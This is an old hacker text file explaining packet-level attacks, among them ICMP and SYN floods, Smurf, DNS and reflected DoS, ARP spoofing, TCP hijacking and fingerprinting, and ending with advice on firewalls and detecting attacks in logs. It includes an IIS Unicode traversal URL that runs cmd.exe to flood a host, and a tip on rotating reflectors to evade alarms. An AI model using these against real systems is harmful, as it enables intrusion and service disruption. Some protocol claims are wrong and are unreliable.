Packet Attacks v2
by Dreifachx and Data_Clast
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
PACKET ATTACKS - VERSION 1.1 (updated feb 25 2003)
Let me start by saying the internet
is full of wonderful tools and papers like this one. A lot of these things can
help you increase your knowledge, perhaps your job or more. But just as easily
as you can learn from them, people read into them to much and decide to harm
other peoples work for no apparent reason. Let it be known that is in no way the
purpose of this paper. A true hacker is one who strives to attain the answers
for themselves through curiosity. Its the path we take to those answers that
makes us hackers, not destruction of other peoples work. So with that said,
please enjoy my work, as I have enjoyed writing it.
The flow of data has always captured
my interest. Just how does it work, how can we dissect it and use it to our
advantage. Well I have spent a long time studying all of this, and that is why
I wrote this paper. It's a collection of run on sentences on different packet
attacks and how they work. Now we all know you can learn all you ever wanted
to know about the specifications of a protocol by reading its 30 page RFC document.
But that is the protocol according to design, in the wild its a different story
all together. 'Packet Attacks' covers everything from basic DOS attacks to TCP/IP
hijacking. Hence the name "Packet Attacks". This paper also focuses not just
on attacks but practical ways to prevent such attacks and ideas on new methods
to help us stop them and secure our networks.
Introduction
Well I assume most of you reading this
paper already have a good understanding of TCP/IP and how it works so I wont
get to much into detail on that, but I will scrape the surface on the parts
we NEED to discuss. The internet is a MASSIVE web of machines all connected
to one another through a series of hardware devices known as routers, switches,
hubs, bridges and lots more. All of these devices (although some are smarter
then others) push along packets. Our operating systems and applications craft
these packets in order to send data to one another over the wire. Each packet,
although varying in size, carries a small bit of data to and from one host to
another. Each packet must also carry its own personal information such as where
it came from and where its headed. Of course there is a lot more to a packet
then just this information. But as far as attacks go this is the crucial information
we need to look at. Now there are many many different types of protocols that
craft many different types of packets. And they are all read differently when
they are received at the other end. Where as an ARP packet may tell a host who
has this MAC address on this subnet, a TCP packet might transfer the last few
bits in that MP3 your downloading. Regardless the data, all of these packets
use the same wire to move to and from locations. I couldn't possibly discuss
every protocol and packet structure in this one paper. The average end user
takes for granted all of this running in the background while they surf the
net. Most people don't understand the complexity of this internet we are all
so familiar with, the chat rooms etc. But there are people who do, and there
are people who take advantage of that. Reverse engineering has led to the creation
of attacks using the basic fundamentals these protocols rely on. And since TCP/IP
is so embedded in our infrastructure we must adapt and learn to defend each
new attack.
OSI MODEL
Open Systems Interconnection model,
is a seven layered networking design. Its an industry standard that defines
exactly how data is transffered between protocol to protocol. Not every protocol
follows the OSI model exactly and some do. TCP the internets main mode of data
transport does not follow it exactly. Let me take you through a brief over view
of the OSI model.
Layer Seven : Application Layer
This layer is obviously application
specific, it provides everything from authentication to email to ftp and telnet,
the list goes on. Its specifically for end user processes, what we input into
our applications we can see on our screens.
Layer Six : Presentation Layer
This layer changes and possibly encrypts
the data so that the application layer can understand it. (you will understand
what this means in a few minutes)
Layer Five : Session Layer
Think of this layer as Establishment,
Control and Termination of the sessions formed by the
application(client) to a remote host(server).
Layer Four : Transport Layer
This layer is responsible for the invisible
transfer of data between host to host. It is there to ensure all data transfer
goes accordingly. The protocols used are, UDP and TCP.
Layer Three : Network Layer
This layer is for error correction,
packet sequencing, and for transmitting data from node to node. Addressing is
also another function of this layer in inter-networking.
Layer Two : Data Link Layer
This layer decodes and encodes packets
into bits so they are ready for the physical layer. It also handles error correction
in the physical layer. This layer is also divided into two different sub-layers.
The LLC (logical link control) and MAC (media access control) sub layers. The
LLC sub layer provides control for frame synchronization and error checking.
The MAC sub layer controls how a computer on your network has access to data.
Layer One : Physical Layer
This layer is the actual movement of
the data. Using electrical impulse or some other form of data movement is pushes
the bit stream towards the other host. This layer is the hardware level, the
ethernet card, the wire etc. There are many protocols within this layer.
You may ask yourself why I listed these
from 7 to 1. Well I did to show you how the OSI model really works. Layer Seven
really comes first, the end user types something into his instant messenger
(for example) and the data flows down through the OSI model being encapsulated
and changed at every level it has to be changed or corrected at. The data travels
the wire and at the other end it moves back up the OSI model all the way back
up to layer seven where the other host can read it in the original form it was
sent. So there's a VERY basic understanding of the OSI model and how it works
to transmit data from host to host. There is alot more protocols and parts to
the OSI model but this basic representation should provide a firm understanding.
To understand all of this more in depth
please get your hands on a few RFC (request for comment) documents and start
reading. Because it will take you a very long time to understand exactly how
TCP/IP works. If your very knowledgeable in the way TCP/IP works then this paper
should make a lot of sense to you, perhaps even bore you! :( On the other hand
if you don't understand TCP/IP as well as you would like to, you still might
get something out of this. I try and explain all of the technical writing as
easily as I can. Feel free to email me if you have a question or comment. Thanks
:)
Data_Clast
Chapter 1
The most common attack on the internet
today is a denial of service attack. There are many programs on the internet
today that will assist anyone in crafting one of these attacks. The sad part
is for as easy as they are to make their power can be destructive when used
properly. No matter what kind of packet attack it may be most are based on the
same principal, volume. Thousand and thousands of spoofed packets will eat up
network resources within minutes, choking and essentially 'killing' any network.
There are many types of packet attacks. Some are more sophisticated then others.
I will also talk about TCP/IP hijacking and your typical port and vulnerability
scans among other things.
Why do people launch these attacks?
How are they launched? How do they exactly (technically speaking) 'choke a network'?!
Hold tight im getting to that. The lower end of these attacks are usually launched
by what the hacker community calls a script kiddie. You see a hacker isn't a
mindless web defacing juvenile (please see the mentors manifesto). A hacker
is a person of true intellect and would never craft such an attack for no reason.
But these lower end attacks are usually launched at peoples individual machines.
Their IP address's may come from an IRC chat room, yahoo messenger, AOL, ICQ,
or whatever other messenger you might use. Although not as sophisticated, these
'lower end' attacks can still knock an individual machine offline in minutes.
The slightly more advanced attacks may be aimed at a business competitor in
order to slow their sales or disrupt their outgoing internet connection. Whatever
the reason may be they are usually launched for a reason. Attacking a box for
no reason is typically useless and will only take up your own bandwidth.
The more sophisticated attacks are
aimed at government and root points of the internet. Such as the attacks on
the root DNS servers in October of 2002. These attacks were sophisticated in
the way they were crafted. The attacks lasted for over an hour and successfully
took out a few of the servers. If the attack had lasted just a few more minutes
who knows the damage it could have caused. The possibility of the authorities
solving these attacks and apprehending the offenders is slim to none because
they are created and launched by skilled malicious individuals. They were also
distributed denial of service attacks. Which means the 'zombie' machines that
attacked the servers were spread out all over the world. We will touch more
on that later though.
You will learn more about how these
individual attacks are crafted and how they work later in this paper but this
is small introduction so you can get a vague idea. Creating spoofed packets
requires an open socket. This socket binds to an IP and a port and allows you
to inject a packet onto the wire or accept any incoming packets to that IP and
port. *NIX openly supports open socket programming (many tutorials on this type
of programming). Which means you can code programs that create packets and then
inject them into the network with ease. An example of this would be a program
called "SENDIP" which allows you to create custom packets, and it supports many
protocols (another good program is nemesis). I have written a few tutorials
using SENDIP, I think its a great program for both advanced and new network
engineers to use. It will help you learn about packet structure and the different
protocols it supports. Microsoft is not an open source company, which pretty
much makes it even harder to find help in creating these sorts of programs for
Windows. But it is possible to craft these attacks from within a Windows environment.
Its referred to 'Winsock' programming. Infact most of these DDOS attacks are
because of vulnerable Windows boxes out on the net. They are sitting ducks for
trojan horses and other programs that craft these attacks on servers when commanded
from a client program to do so. Most end users do not understand security and
how easy it is to break into someone's home computer, so they lack firewalls
and virus scanners. This leads to many zombie machines available to hackers
disposal on the net. All one has to do is scan a class C subnet for open trojan
ports and hack their way into those trojans and use them as a backdoor, another
zombie is created for attacking remote targets. Almost every program that interacts
with TCP/IP generates packets to and from places, this is valid traffic. As
you read you will distinguish the difference between valid and non valid, as
it easy pretty easy to understand what I am explaining when I say "attack".
When creating an open socket and crafting spoofed packets these programs tell
the kernel they are going to construct their own IP headers. Usually this information
is put on by the kernel before exiting the machine. But in this instance we
are telling the kernel we want to specify our own information. Not all operating
systems will allow this. And no I don't have a detailed list of which do and
which dont. Most of the experiments I have conducted on my network used different
versions of RedHat Linux, Mandrake Linux, and Windows XP.
Chapter 2
There are several different types of
packet attacks. There's the simple brute flood of ICMP packets which floods
a network and eats up all the available bandwidth. And then there are more sophisticated
attacks like the Smurf or SYN/ACK attack. All of these attacks target different
things. While the SMURF attack may target the general network its attacking,
the SYN/ACK attack targets a specific host or service running on a host. We
also must take into consideration when a target is attacked it may not be the
only machine affected. There are many routers and other boxes transferring the
data between point A and point B. Other peoples legitimate data is flowing between
them, and may be disrupted by the packet flood. Even a top of the line router
can only handle so much data. And unfortunately it is very easy to attain source
code for these attacks all over the web. Lets take a more detailed look at each
attack.
ICMP Brute Flood Attack
ICMP works on top of TCP. The ICMP
protocol is simple yet very effective. Its used for error correcting and testing
network connectivity. Your average PING program uses ICMP packets to test network
connectivity. By sending a small amount of arbitrary data in an ECHO_REQUEST
packet it waits for a reply from the target host, simple right? A typical ICMP
packet is called an ECHO_REQUEST. You send 4 or 5 of these at a target machine
and when it arrives there it requests an ECHO_REPLY. Thats when everything is
done according to design. If you want more info on an ICMP packet and how it
works then read my tutorial on that!
In this attack the source IP address
is spoofed. So now hundreds, thousands of ECHO_REQUEST packets rush towards
their destination. They reach point B, request an ECHO_REPLY for every ECHO_REQUEST
sent. Point B says OK, reads the source IP. The source IP ends up being unreachable.
ut point B is waiting a small amount of time (milliseconds) to determine that
for every packet thats hitting it. It will be a few more moments before the
process relinquishes this small bit of memory back to the system. This adds
up to a great deal of packets and memory allocation building up. Now if these
packets are coming from multiple source zombies (DDOS) then this means there
each coming from different routes. So even if one ISP stops one attack, there
are still many more zombie machines attacking the victim. All of this is eating
up time and bandwidth, because with every millisecond that passes more and more
bandwidth is being taken up. Eventually point B can no longer keep up with the
ECHO_REQUESTS and his connection is completely flooded and of no use. On an
unprotected system or router this attack can be very consuming. This attack
is also sometimes referred to a bandwidth attack. Even if the target is running
an advanced firewall it cannot protect the wire it connected to from being flooded
with packets. There have been changes in this attack as well. On the net there
are what we call amplifiers. On every network there are the network and subnet
addresses. In many default configurations when you ping either one of these
addresses they multiply the echo requests by 4 or more. So a zombie would attack
a vulnerable network (.0) or subnet address (.255) with a spoofed source IP,
being the victims real IP. So even tho the traffic becomes valid as far as IP
addresses go. The victim gets bombarded with massive ECHO_REPLY packets. You
will see more of this description in other attacks, as it works for some of
those to.
[zombie machine] -->ICMP ECHO_REQUEST
(source IP = 1.1.1.1) -->-->--> [target]
[??????????????] ICMP ECHO_REPLY (destination
1.1.1.1 ?)<-- [target]
Hopefully that simple drawing shows
you exactly how this attack works. Its very very simple, massive ICMP packets
with spoofed address's taking up network resources. The simplest of attacks.
Smurf Attack
(first part is repeat from ICMP attack)
There have been changes in the ICMP attack. On the net there are what we call
amplifiers. On every network there are the network and subnet addresses. In
many default configurations when you ping either one of these addresses they
multiply the echo requests by 4 or more. So a zombie would attack a vulnerable
network (.0) or subnet address (.255) with a spoofed source IP, being the victims
real IP. So even tho the traffic becomes valid as far as IP addresses go. The
victim gets bombarded with massive ECHO_REPLY packets. You will see more of
this description in other attacks, as it works for those to.
You can try this attack on your home
network by simply opening a packet sniffer on each machine that is on. Pick
a machine, any machine and ping your broadcast address. Mine is 192.168.0.255
Immediately you see each machine receiving a broadcast packet. Now imagine its
several hundred and each one has a spoofed source IP address. Its a brute ICMP
attack on a massive scale, this possibilities to this attack are endless. You
could easily implement this attack in anyway you chose. You could spoof the
victims real IP as your source IP and create massive volumes of legit ECHO_REPLY
packets. Even though its valid traffic, its 4x or more times the normal load
of valid traffic. This consumes the connection and valid traffic cant pass,
or passes so slowly it makes no difference to the end user.
[zombie machine] --> ICMP ECHO_REQUEST
source ip = 10.2.2.2 --> to: broadcast router 4.1.0.255 (router multiplies
the ECHO_REPLY packets by 4x! --> --> --> --> [victim 10.2.2.2]
SYN/ACK Attack
The SYN/ACK attack is a very powerful
attack. SYN/ACK packets are also used in TCP hijacking, and the TCP/IP three
way handshake. When an application wants to connect with a server somewhere
over the net via a TCP connection (connection vs connectionless data transfer
(UDP)) it first sends a SYN packet. The SYN packet tells the target machine
he wants to make a connection on a certain specified port, and then send data.
When the target machine read the SYN packet it replies to the original host
with a SYN packet of his own and an ACK (acknowledgement) packet with sequence
and ack numbers. These SEQ and ACK numbers are used to synchronize the data
transfer, incase one or two packets gets lost or slowed down along its route,
it can be assembled again in the correct order. The orignal machine replies
again with another SYN ACK packet combination acknowledging the sequencing numbers
and then it starts to send data. When it creates this connection a tiny piece
of memory is allocated to hold the connection while the packets are in route.
Now a SYN/ACK attack would consist of spoofing the source IP address on the
original SYN packet. The target receives the request for a connection, reads
the spoofed source IP and tries to send its own SYN and ACK packet to a destination
that does not exist. Most operating systems will continue to send SYN/ACK packets
if they dont receive a reply as a method of error correction and guaranteed
data delivery. Just like in the ICMP attack the machine has to wait a few milliseconds
before abandoning all hope of reaching the machine. So these tiny allocated
spaces of memory are building up with every spoofed packet that arrives at the
target. This attack is very powerful and can disable a service running on the
target machine in a matter of minutes. Not to mention all the available bandwidth
is eaten with thousands and thousands of spoofed packets. So there is the SYN/ACK
attack in a brief description.
[zombie machine] --> SYN packet
(source IP 1.1.1.1, port = 23 telnet) (seq = 100) --> [target]
[??????????????] <-- SYN/ACK packets
sent (seq = 300) (ack = 101) <-- [target]
As you can see from the simple drawing
above the target machine has no idea who is sending the SYN packets and the
telnet server he is running on port 23 would most likely crash. At best the
telnet daemon would not allow any other legitimate traffic through, as it could
not gather enough resources (memory, bandwidth) to make the connection due to
all the spoofed packets.
Another use of this attack is to disconnect
a user from their current TCP session. By spoofing SYN/ACK packets to a server
a client is currently using. An attacker would place a "FIN" flag in the packets,
this tells the server the client is done sending data. Client uses his connection
and attacker walks away undetected, because it only took one packet to accomplish
this.
UDP Attack
UDP is a protocol that is used to transfer
data. Short for USER DATAGRAM PROTOCOL. UDP offers very little error correction
and is used as an alternative means for data transfer. It doesn't require the
3 way handshake such as the SYN/ACK method, so its initial attack may not take
down a remote daemon as quickly. UDP is generally used to broadcast messages
over a network. A UDP attack would consist of spoofing the source IP addresses
and specifying a port number like in the SYN attack above. UDP packets are generally
large because they are usually used on closed 100mb subnets (LANS). So an attack
would set flags in the packets and fragment them (break them up and flag where
in the packet they broke, so they can be reassembled on the receiving end).
For example in Windows 2000 there was a remote UDP DOS exploit that used the
IKE service running on port 500. All an attacker had to do was connect to port
500 on a random machine with that port open. Start sending massive UDP packets
(above 500 bytes) to that service and the CPU usage would hit 99% and the machine
would lock up. The typical ports that accept UDP packets are 7, 13, 19 and 37
on a Windows box.
DNS Attack
The DNS attack is a special one. Not
as easily crafted as the others, there aren't that many tools readily available
to the average script kiddie to construct such an attack. The DNS protocol is
used for name resolution, 216.239.35.100 = google.com, simple as that? Well
not really. A DNS attack is based on the fact that a DNS query takes very little
data and bandwidth to create, but a DNS response is much bigger. So this is
how a DNS attack would look like.
10.10.10.10 = victims IP
[dns query packet (who is google.com)]
--> source IP is 10.10.10.10 --> [dns server]
[dns server] --> --> --> [dns
response] [dns response] [dns response] --> [victim]
As you can see the attack is sort of
relayed from a legitimate DNS server. Although the DNS response packets are
'legit' there is a massive flood of them because the DNS server that is sending
them is a very good machine on a very good connection. The end user, most likely
a home pc, gets flooded with these huge DNS response packets it never asked
for.
ARP Attack
The arp attack is a special one, it
can be used to 'hijack' a tcp connection currently in session or it can be used
to sniff the legitimate traffic on a wire other then your own. Which is a very
dangerous thing in the information world we live in today. There are a few methods
of this attack. Lets say person1, attacker, and server are all on the same subnet.
Person1 and server currently have an FTP session open. Attacker sends both server
and person1 an ARP packet containing an invalid MAC address. Now both of their
arp tables are messed up for atleast 30 seconds. Server and person1 cant find
that invalid MAC address so they send their data to the IP its associated with,
the attacker. So in this case the attacker has a sniffer setup and hes collecting
a ton of data. Now the attacker (an advanced one at that) can issue commands
as person1 to the server. This attack takes timing and skill to pull off on
the internet, but on a LAN its very easy. It only allows for maybe 30 or so
seconds of sniffing, until their arp table is constructed properly again.
DRDOS Attack
A DRDOS attack uses a little of other
attacks to inflict damage. This attack spoofs the source IP address of SYN packets
to the IP of the victim. It requires a third party. This is the part of the
attack that makes it so easy. All it needs is some ftp, web server, telnet..
ANY service that will reply with an ACK packet, anywhere on the internet. Could
be Angelfires free ftp servers, could be your neighbors web server running off
his 233mhz Compaq with IIS 4.0. It doesn't matter! The SYN packets are sent
to that services IP address and they of course reply with a steady stream of
SYN/ACK packets to the victim. Most likely directed towards an open port on
the victims machine, crashing that service and the system. These attacks are
near impossible to track down. This attack is quite possibly the strongest DOS
attack in my opinion. For every SYN packet you send the middle man, it sends
out up to 4 SYN/ACK combinations to the victim. And each time the victim doesn't
respond the middle man sends even more (error correction). This allows the attacker
to construct a massive attack from just one machine with a broadband connection.
There are more dangers to this attack as well, there are hundreds of thousands
of FTP, web servers and many more services running on the net today that will
deflect these SYN/ACK packets at the victim. So in theory this attack could
use any number of 'middle man' servers to bombard your network with packets.
Bot / Trojan DrDOS Attack
Recently many IRC bots and trojan servers
have found their way to users home computers via email and .exe binding etc.
They are just backdoors to any system they have infected. If u really want to
read into this goto www.grc.com This guy knows a lot about these attacks because
he was the target of one. These bots infect a machine and join an irc server
and a private channel. Its an army of zombies collecting in a room. The attacker
enters the room and can issue commands at the army of bots to attack a target
anywhere he wants. With any kind of attack he wants to use. This type of lameness
can be easily stopped with a home firewall like zone alarm and denying internet
access to the bot. Or a good virus scanner, both should come standard with every
operating system. But you will have to email Bill Gates about that one. The
attack its self is a bit like bandwidth hogging, the term is DrDoS (Distributed
Reflected Denial of Service). Another analysis of the attack is below,
Not to go into much detail about this
one, however it must be said, this attack type is full power and if used in
the wrong hands could and most likely will cause serious damage, to the host
attacked. Like above the attack all depends on the amount of zombies the hacker
has, for example if a hacker had 30,000 infected zombies (bots) all with the
upstream of 1024kbps, thats 30,000 meg upstream / a sec. Aimed at a web host
for about 10 mins thats 300,000 meg a sec enough to take down some of the leading
webhosts and even if the Ip's are blocked the router still has to say no to
the packets, so by now you should see the problem. The fact is home users should
be targeted to prevent these attacks at the source.
Once you open the bot/trojan it secretly
logs you into a IRC room, where the hacker can sends group commands to all his
bots. Keep protected with firewalls, such as "Sygate" www.sygate.com and anti-trojan
system such as "The Cleaner" www.moosoft.com.
Worm Attack
Worms are special 'breed' of programming.
There advanced, and very sophisticated. The recent SQL worm we saw came with
a built in DOS attack on the servers it infected. The worm did not damage files
or anything like that but it kept trying to find other servers to infect. It
used big UDP packets in order to find other vulnerable servers to infect. When
no servers that could be infected were, found the worm created DOS attacks on
the networks it was on. The network became flooded with UDP packets, denying
service to legitimate clients. A worm can also act like a Bot or trojan server.
In which when it infects the target it instantly begins to attack a pre-programmed
target with random source IP addresses. Its a deadly race to clean these worms,
because the target may never be free of the attack if the worm infects enough
people. This was the case with the Code Red worm. I suggest reading about the
Code Red worm on the internet as it is very interesting :]
Unicode Ping Flood
This attack is native to the unicode
bug found in most IIS web servers. Here's a sample:
http://imnotsecure.com/scripts/images/..%c0%af..%c0%af..%c0%afwinnt/
system32/cmd.exe?/c+ping+10.10.10.10-n+1000+-l
Ok this is one of MANY unicode strings
that are possibly useful on a vulnerable server. But you see the unicode bug
accessing the command shell on the target host. And then issuing the command
to ping 10.10.10.10 forever with 1000 byte ICMP packets. Now these packets aren't
spoofed but they are still traffic and with enough vulnerable machines the traffic
volume begins to build up.
This section is very small, its on
the topic of phasing. Phasing is a very simple yet very effective method of
using DOS attacks without setting off alarms at a router somewhere for the volume
of packets the attacker is sending. I will only give one example attack with
this method since it is sort of self explanatory after you read it once. Lets
take the DRDOS attack. Your sending spoofed SYN packets at servers all over
the internet. Well without breaking a sweat you could code a program in C that
simply switches the servers you are deflecting off of every 3-4 mins. It takes
the server 3 or 4 mins to stop sending SYN/ACK packets when it doesn't receive
any ACK in return from your victim. So after the 3 or 4 initial minutes of the
attack you begin to phase your attack to a different server, and your packets
take a different route. You could phase your attack over a group of 25 servers
or a group of 1000 servers. Attacking with 5 at a time, and switching every
4 minutes. This method of attacking is very effective and doesn't raise any
alarms. Which is not good.
TCP Hijacking
3 way handshake
[zombie machine] --> SYN packet
(seq = 100) --> --> [target]
[zombie machine] <-- SYN/ACK packets
sent (seq = 300) (ack = 101) <-- [target]
[zombie machine] --> SYN/ACK packets
sent (seq = 101) (ack = 301) --> [target]
[zombie machine] --> SYN/ACK packets
sent (seq = 101) (ack = 301)-DATA-DATA -->--> [target]
Above is the basic three way hand shake,
according to design. Now there are different types of TCP hijacking. There are
attacks where the attacker can actually issue commands, as the victim, to a
server. This requires knowing the next sequence numbers the server is expecting
from the client. This is difficult, but not impossible. And then there is passive
sniffing of the traffic intended for the victim. In this method the valid traffic,
after being sniffed and saved by the attacker, is all forwarded to the real
client. This completely avoids any detection, the attackers machine just looks
like another router. Now this is done by changing the victim or servers arp
table. This attack is not limited to a subnet, it works on the internet to.
Lets say server1 has a connection going
with client1. The attacker would ping his victim, client1. Capture the ICMP
data and extract his MAC address from it. Now armed with that MAC address, the
attack creates a spoofed arp packet and sends it to the server. The server receives
the arp packet and changes its arp table. Now it thinks that client1's MAC address
belongs to a new IP address, the IP address of the attacker. Now when the server
constructs its packets to be sent to client1, it compares the MAC address in
its packets to its arp table as it passes through the network layer of the OSI
model. It matches up the MAC address with the IP address of the attacker. The
traffic is then sent off directly to the attacker. Now to avoid detection, the
attacker redirects the valid traffic, after logging it, to client1. Now the
attackers machine looks like another router, almost unnoticeable to the average
end user. This is called passive sniffing. This will only last until the server
has updated its arp table. We can complicate this matter and change the clients
arp table so it only sends its arp requets to the attacker first. Where he drops
the packets, therefore server and client are never updating their arp tables,
and the continous flow of data between them is logged by attacker.
Sniffing
There are different ways to 'sniff'
the traffic of other machines. One was was described above using the arp method
to redirect someone else's specific traffic at your own machine. This method
only allows you to sniff the certain traffic you were looking for. But on a
local subnet, say at your work or home, if you run a sniffer you can see ALL
the traffic on the wire. This includes every protocol. This is called promiscuous
sniffing. A packet sniffer works by capturing (copying) all the data on the
wire. This traffic does reach its legitimate target, but you are viewing a copy
of the raw packet in your packet sniffer. Packet sniffers usually dump the packet
in the form of a HEX dump because it is easy to decipher and manipulate. Using
a packet sniffer can be very useful, you can run your sniffer and ping a victim.
This captures the return ICMP packet and an attacker can extract his victims
MAC address from that data. A MAC address is very easy to pull from a hex dump
because it is in HEX form to begin with. Some newer programs will even allow
you to reassemble the packets and create what they were intended for. Now this
is easier when reconstructing say HTTP packets then just a few TCP packets containing
your MP3 data. The HTTP data is easier to reassemble. Another form of packet
sniffing may be much more intrusive. An attacker can install a sniffer by remotely
breaking into a machine. The attacker sets the sniffer to only pick up plain
text login and passwords it finds in packets. Then he returns a few weeks later
to retrieve the data the sniffer has found. This type of sniffing is the most
dangerous because the attacker has full access to every single packet your machine
generated and received since the sniffer was installed.
Scans
Scans are the most common thing on
the internet. The average broadband customer receives up to 40 scans within
the first three days of owning their new connection. There are 2 types of scans,
port scans and vulnerability scans. A port scan is very basic but imperative
to an attack for gathering information on your machine. A port scanner sends
a SYN packet to each port specified by the attacker on the victims machine.
If that port is open and there is a daemon / service running it returns a SYN/ACK
packet and port scanner reports that port as 'open'. A firewall would pick up
on the individual packet shape of the request for a certain port, and send no
ACK back and possible connection Termination/Refusement. Certian port scanners
like Nmap are extremely advanced and will have options to stealth scan, or not
to ping the host. A vulnerability scanner scans an IP address for ports as well,
but it goes beyond that. The vulnerability scanner attempts to scan the services
running on the open ports for known vulnerabilities. Now most scanners are made
for administrators to harden their security. But these tools are easily available
to attackers. A typical vulnerability scanner will scan a website for known
unicode bugs, buffer overflows, and weak passwords among many things. Now its
not illegal to scan any IP address but its most likely the sign of an attack
in the making. These types of vulnerability scans can also fill up a targets
log files very quickly.
Information Gathering / Finger Printing
Before attempting to gather information
on a remote target its important to build an information database on each of
the possible OS the attackers target could be running. Such as identifier values,
TTL, TOS, and possible services the OS could be running by default. Use this
database to compare the results you build up after using various methods. Some
of the simple "banner grabbing methods" work very well, but there are more stealth
like methods, TCP/IP finger printing. Both methods are described.
Information gathering is an essential
part to any attackers plan. But this cant always be done with neat little applications,
it takes brains and skill if the attacker does not want to be caught. Before
attempting to gain root access on a remote box an attacker must know what he's
attacking. Different operating systems are like night and day, they all have
different security holes and vulnerabilities. The attacker has probably already
done a port scan on his target. Lets say for the sake of argument he has found
port 21 (ftp) and port 80 (http) open. Well now he wants to know what version
FTP and what web server his target is running. This is easy information gathering.
$ ftp 10.10.10.10 <-- victims IP
= 10.10.10.10
And it should return what version FTP
daemon it is.
Finding out the targets web server
and version is just as easy.
$ telnet 10.10.10.10 80
get / http/1.1 (many variations of
this banner grabbing)
This will return an HTTP header and
the type and version of the web server. If its IIS the attacker looks at the
version # and can instantly tell what version WINNT or 2000 he is running. This
method can be done on the FTPD port the target is running also.
Now the attacker just heads off to
google.com to search for vulnerabilities in the software the victim is running.
Its that simple, yes very lame and doesn't take much skill. But there is skill
to information gathering. An attacker who didn't want to raise such attention
to himself to the sites admin would use a different way of gathering this information.
From one simple ICMP ECHO_REPLY a skillful attacker can read the values in the
packet data to determine OS type. There are Identifier bits in packets. Here
are a couple examples of identifier bits for Windows machines.
Microsoft Windows NT - 256
Microsoft Windows 98/98SE - 512
Microsoft Windows 2000 - 512
Microsoft Windows ME 768
Microsoft Windows 2000 Family with SP1 - 768
XP - 512
These above values are the values different
Windows machines will return. *NIX machines return all different sorts of values
as well, you will have to do more research on the value you get and match it
up with your prepared OS information database.
The TTL value in a packet specifies
how many hops the packet can travel before being dropped or recreated. The TTL
value is another form of OS detection, a Windows box will return a TTL of 128.
Where as a Redhat box will return a value of 64. Routers and switches will return
a low value as well, usually around 64. These are little examples of TCP/IP
stack fingerprinting. Its forensic work on a much smaller scale then running
a vulnerability scanner on a target and alerting the admins that the attacker
is inspecting them. Much can be told from examining one packet. The data inside
the packet is irrelevant, the IP headers generated by the target are what you
need to examine. Every OS has its own way of forming these headers and values.
Telnet is probably the best way of
remote OS detection. If the attackers target has a telnet daemon running and
he attempts to connect to it, he doesn't even need to logon with the proper
credentials to see what OS and version you are running. For example
$telnet 10.10.10.10
Red Hat Linux Release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
This is probably the most obvious form
of remote OS detection. Its among the basic "banner grabbing" methods.
Finally I just want to suggest a tool
on this topic, NMAP. NMAP can perform remote OS detection through various TCP/IP
stack finger printing methods. There are command line and GUI versions, its
very reliable and dependable. NMAP is just the first in a long line of tools
available to you on the internet. But most of use the same methods described
above, TCP/IP stack fingerprinting. Some OS can produce the same results as
another OS and this can make it even harder to make an accurate guess at the
OS. But this will eventually lead to better ways of detection.
Protecting yourself against the packet
attacks described a few paragraphs above can be simple or can be hard depending
on how you want to go about it. You must take into consideration your network
topology as well, the way it is physically and logically setup. If you are running
a webserver on port 80 then this port will be a sitting duck for SYN attacks.
Unfortunately TCP/IP wasn't designed to be secure. This port needs to be open
in order to accept legitimate SYN/ACK and HTTP packets among many. But you can
still protect your network by installing basic firewalls. Firewalls are software
or hardware that can be configured to allow and block certain specified network
traffic. Firewalls are imperative for networks with machines behind them on
a LAN. As well as for stand alone machines. Configuring your firewall is easy,
first you need to examine the traffic you must allow in order for people to
access your website or FTP server. At this point you may want to block the rest
of the traffic. This isn't always a smart move. Outbound firewalls are usually
only applied in a business environment when you want to restrict access to certain
websites outside of the LAN. If every machine on your LAN is trusted, or its
your home network then applying outbound firewalls may not be a good idea. It
all depends on your situation. Outbound application blocking is however important
in a home environment. A free firewall like Zone Alarm provides an excellent
application blocking feature. You supply the firewall with a list of applications
that can access the network, this blocks trojans and worms from spreading or
making communication with the attacker over the internet. Inbound firewalls
on the other hand must be hardened to secure your internal machines. Blocking
all ICMP traffic would stop your attacker from receiving an ECHO_REPLY packet
when he pings your IP address. But ICMP is sometimes very useful for error correction
and network connectivity testing.
Your firewall can also be configured
to detect a flood of traffic. Lets say your web server isnt hosting any applications
for download. Its a simple web page designed to update your viewers on current
news and things happening in your business. Well this means there wouldn't be
that much traffic flowing between you and your viewers besides the normal HTTP
packets. You can configure your firewall to stop responding to a certain IP
address after your server receives 'X' amount of packets from them in 'Y' amount
of time.
Above we talked about the Smurf attack.
The attacker uses your router in order to broadcast these massive amounts of
packets throughout your subnet. By default these routers are set to broadcast
this traffic that hits their network address of .255 . This can be as simple
as disabling that feature! Yes my friends these precautions seems almost ridiculous.
You must be thinking anyone that doesn't do this the second they set their machines
up is truly dense. But these attacks happen everyday, all over the internet.
Default installs will be the death of the internet.
Many of the DOS attacks above have
no perfect solution to stopping them. Its a game of wits, out smarting your
attacker is the best way to stop these attacks from happening. Keeping your
software up to date and your hardware configured correctly is the best way to
secure your network. Often running vulnerability scans and attempting to exploit
and break your own network is the best way to protect it from malicious attackers.
Attack Detection
Detecting attacks on your network are
quite easy. In the event of a DDOS attack you will most likely notice your internet
connection is dead. The only traffic that moves fast is the traffic inside of
your network, depending on the attack. Then there are the physical signs, your
switches or routers are all lighting up like a Christmas tree. Your firewall
logs are the best place to go when you think you are the target of an attack.
Here's a line from my routers firewall with the original IP address changed
to hide the real attackers IP address.
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 21
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 23
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 10.10.10.10:38461 to TCP port 443
This is an example of someone port
scanning me for open ports. This type of stuff is easy to pick out of your logs
because of how neat and clean it is. Its obviously someone sending one SYN packet
to each port he wants to check on your machine. These logged attempts are usually
right next to one another. Now a SYN attack would most likely look similar to
these logs. Except they would all be directed towards the same port and the
source IP would look obviously fake such as this 1.1.1.1
Friday, February 21, 2003 5:32:38 PM
Unrecognized access from 1.1.1.1:38461 to TCP port 80
Friday, February 21, 2003 5:32:38 PM
